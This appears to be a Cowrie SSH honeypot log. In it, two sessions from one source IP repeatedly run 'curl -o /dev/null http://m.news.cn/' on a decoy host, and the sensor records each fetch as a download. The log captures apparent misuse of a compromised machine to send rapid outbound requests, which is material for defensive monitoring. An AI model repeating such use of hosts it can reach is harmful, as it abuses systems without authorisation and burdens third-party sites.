{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.226624Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.231532Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.232483Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.235893Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.264950Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.266026Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.267240Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.271197Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.271979Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.275665Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.284860Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.313238Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.314261Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.318384Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.319272Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.325187Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.352172Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.353289Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.357188Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.357930Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.375125Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.378147Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.388558Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.389654Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.394498Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.395958Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.422526Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.423947Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.427878Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.429125Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.435359Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.436359Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.441143Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.444917Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.450053Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.468089Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.469141Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.477095Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.477836Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.481537Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.493822Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.498894Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.506279Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.507368Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.516312Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.517227Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.525149Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.530693Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.545617Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.546619Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.554555Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.555587Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.562887Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.582569Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.584086Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.595202Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.596180Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.598966Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.608640Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.619759Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.620869Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.624353Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.634550Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.635583Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.643071Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.649038Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.655127Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.656012Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.684788Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.689844Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.690744Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.693513Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.694173Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.704087Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.733738Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.735345Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.739443Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.740475Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.744454Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.745301Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.758827Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.771558Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
